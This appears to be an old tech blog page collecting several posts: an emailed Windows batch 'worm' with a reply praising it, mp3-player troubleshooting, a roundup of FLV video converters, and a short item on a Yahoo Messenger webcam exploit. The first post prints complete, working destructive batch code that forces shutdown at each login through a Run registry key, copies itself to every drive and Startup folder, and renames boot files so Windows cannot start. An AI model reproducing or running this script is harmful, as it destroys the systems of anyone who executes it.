Anatomy of an worm written with plain windows batch commands

On 8/26/07, Shezan <shezan2k7@gmail.com> wrote:

Yes I created it with Notepad. I actually created a MS-DOS .bat file using notepad and then converted the shezan.bat file to .exe using using a bat2exe software.. Its nothing . kono bhabe jora tali die baniechhi... Check the source code.....

@echo off
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! I used to do this long ago lol ... But dont work with .bat files since 1999

And good that you've found a great security hole windows has. Its a security hole because Windows lets the program change certain settings without making precautions. Have you tested the renaming part of this?

Now listen.. its nothing near to virus. Its just a malware. Virus needs lots of capability to be called as a virus. Replication, infection, spreading automatically, infecting new PCs through any executable files and many more. It can though be called as an worm. U used sub7's icon with your .exe file thats why I thought its sub7's variant.

12-16 is your Birthday?

Enough with Batch coding now learn real programming with C++, C#, Java etc.

Antiviruses detect it as those test in heuristic mode...

Problem in mp3 player

On 25 Aug 2007 19:54:37 -0000, Zaman <visit****@rediffmail.com> wrote:

hi,
I'm facing problem with my mp3 player....
it's working well when I connect it to my computer through USB port....
but when I click on safely remove hardware on task bar to disconnect it from pc the computer show me message
that "prblem ejecting mass storage device", "The device generic volume cannot be stopped right now.
Try stopping the device again later".

what should I do?

Thank you.

Your PC might be infected with a virus which tries to access the removable device when u are not. May be thats why its giving that error. Before ejecting make sure u closed all windows which opened any media from your MP3 player. And also check with antivirus if you cant get rid of the problem. If the device is bz it wont release, remember that.

Thanks

Convert Flash Video .flv Files to .mpg or .avi and Other Media Formats

With some tricks, it's now possible to download the videos that hosted and shared on online video sites such as YouTube and Google Video, instead of just watching the video embedded on the websites.

Some video files that are downloaded from these online video hosting sites may be in the format of Flash Video (.flv). For whatever reasons, such as prefer to view and store the videos in mpeg format, or want to play the offline video clips in portable player such as PSP and iPod, or simply don't like to view it with FLV Player, then there is a need to convert the .flv video format to another format such as .avi, .mov, .wmv and .mpg. There are several tools and conversion utilities that can be used to do the media format conversion.

Riva FLV Encoder

Able to decode Flash Video into AVI, MPEG, Quicktime and WMV. The utility is capable to do the encoding into Flash Video too, and comes with a FLV Player. The conversion may have issue of audio codec cannot be transcoded. For solution and conversion tutorial, visit VideoHelp.

Total Video Converter

A total solution to video conversion which supports reading, playing lots of video and audio formats and converting them to popular video formats. Supported source/input file formats include:

Video Formats:

• Rmvb(.rm,.rmvb)
• MPEG4(.mp4)
• 3gp(.3gp, 3g2)
• Game Psp(.psp)
• MPEG1(.mpg, mpeg)
• MPEG2 PS (.mpg, mpeg, vob)
• MPEG2 TS (DVB Transport Stream)
• Ms ASF(.asf, .wmv)
• Ms AVI(.avi)
• Macromedia Flash video FLV (.flv)
• Real Video (rm)
• Apple Quicktime(.mov)
• FLIC format(.fli, .flc)
• Gif Animation(.gif)
• DV (.dv)
• Video Formats Dx9 Directshow can open

Audio Formats:

• CD audio(.cda)
• MPEG audio(.mp3, mp2)
• Ms WAV(.wav)
• Ms WMA(.wma)
• Real Audio (.ra)
• OGG(.ogg)
• Amr audio(.amr)
• AC3(.ac3)
• SUN AU format (.au)
• Macromedia Flash embedded audio(.swf)
• Audio Formats Dx9 Directshow can open

Game Video Formats:

• Technologies format, used in some games(.4xm)
• Playstation STR
• Id RoQ used in Quake III, Jedi Knight 2, other computer games
• format used in various Interplay computer games, Interplay MVE
• multimedia format used in Origin's Wing Commander III computer game,WC3 Movie
• used in many Sega Saturn console games, Sega FILM/CPK
• Multimedia formats used in Westwood Studios games, Westwood Studios VQA/AUD
• Used in Quake II, Id Cinematic (.cin)
• used in Sierra CD-ROM games, Sierra VMD
• used in Sierra Online games, .sol files
• Electronic Arts Multimedia, Matroska
• used in various EA games; files have extensions like WVE and UV2
• Nullsoft Video (NSV) format

And Total Video Converter able to convert any of the file formats above to the following video media formats, including of mobile videos or audios (mp4, 3gp, xvid, divx mpeg4 avi, amr audio) which are used by cellphone, PDA, PSP, iPod:

Video Formats:

• MPEG4(.mp4)
• 3gp(.3gp, 3g2)
• Game Psp(.psp)
• MPEG1(.mpg, mpeg)
• NTSC, PAL DVD mpeg
• NTSC, PAL SVCD mpeg
• NTSC, PAL VCD mpeg
• Ms Mpeg4 AVI(.avi)
• Divx AVI(.avi)
• Xvid AVI(.avi)
• H264 AVI(.avi)
• Mjpeg AVI(.avi)
• HuffYUV AVI(.avi)
• Swf Video(.swf)
• Flv Video (.flv)
• Gif Animation(.gif)
• Mpeg4 Mov(.mov)
• Apple Quicktime(.mov)
• FLIC format(.fli, .flc)
• Gif Animation(.gif)
• DV (.dv)

Audio Formats:

• MPEG audio(.mp3, mp2)
• Ms WAV(.wav)
• Ms WMA(.wma)
• OGG(.ogg)
• Amr audio(.amr)
• AC3(.ac3)
• SUN AU format (.au)
• m4a(mp4 audio)

SUPER - Simplified Universal Player Encoder & Renderer

SUPER supports a wide variety of input/source file format to play or encode and decode without any additional third party software. It's a GUI to ffmpeg, mencoder, mplayer, ffmpeg2theora & the theora/vorbis RealProducer plugIn. SUPER is a simple yet very efficient tool to convert (encode) or play any Multimedia file, and most video formats and also portable formats for PSP, iPod, PocketPC and NEC, Nokia, Siemens, SonyEricsson are supported.

FLV Online Converter

A free online FLV converter that grab the video from Youtube from embedded web page and convert it on the fly and let you download the properly converted video.

Media Convert

A universal media and file format converter which also able to convert FLV flash video format to another video format.

VDownloader or Web Video Downloader

A free utility that download flash video from Youtube, Google Video, Grinvi and DailyMotion, and then automatically convert the flash video (FLV) to supported video format such as AVI, MPEG (MPG) and PSP video files. One stone kill 2 birds application if you plan to download your flash video from online video sharing and hosting sites.

MPlayer's MEncoder

MEncoder is an all-purpose encoder that is part of MPlayer, a movie player which runs on many systems. It plays most MPEG/VOB, AVI, Ogg/OGM, VIVO, ASF/WMA/WMV, QT/MOV/MP4, RealMedia, Matroska, NUT, NuppelVideo, FLI, YUV4MPEG, FILM, RoQ, PVA files, supported by many native, XAnim, and Win32 DLL codecs. MEncoder is command-line based with limited GUI. It supports wide range of file formats as MPlayer, and it also enable format conversion to be done in x86, Unix, Linux, Red Hat, Mac OS X and other non-x86 system.

Example of command line MEncode syntax:

mencoder input.flv -ofps 15 -vf scale=300:-2 -oac lavc -ovc lavc -lavcopts vcodec=msmpeg4v2:acodec=mp3:abitrate=64 -o output.avi

Replace input.flv and output.avi to your desired file name.

iSquant

iSquint is an iPod video conversion application for Mac OS X. It will convert most popular video formats, including .flv into .mp4 format.

PSP Video 9

PSP Video 9 is a free PSP video conversion and management application. It can convert regular PC video files (avi, mpeg, flv etc) into PSP video files that can plays in PSP portable player, as well as manage/copy these PSP video files between your PC and PSP.

Videora iPod Converter

Videora iPod Converter is a free video conversion application that converts your regular PC video files (avi, mpeg, flv etc) into the proper video format that can plays on your iPod.

Get help or contribute tips or tricks at My Digital Life Forums.

Yahoo Messenger's Webcam invites may cause trouble

There's a new zero-day attack in progress against Yahoo Messenger users. The instant messaging solicitation invites users to open their Webcam. However, the code used in this China-based exploit causes a heap overflow to be triggered when the target accepts a Webcam invitation. That means a remote attacker could execute malicious code on a compromised machine.

The McAfee security blog recommends the following: do not accept Webcam invites from untrusted sources until a patch is released, and block outgoing traffic on TCP port 5100 on your firewall until a patch is released.

Yahoo has been informed and says it is working on a patch.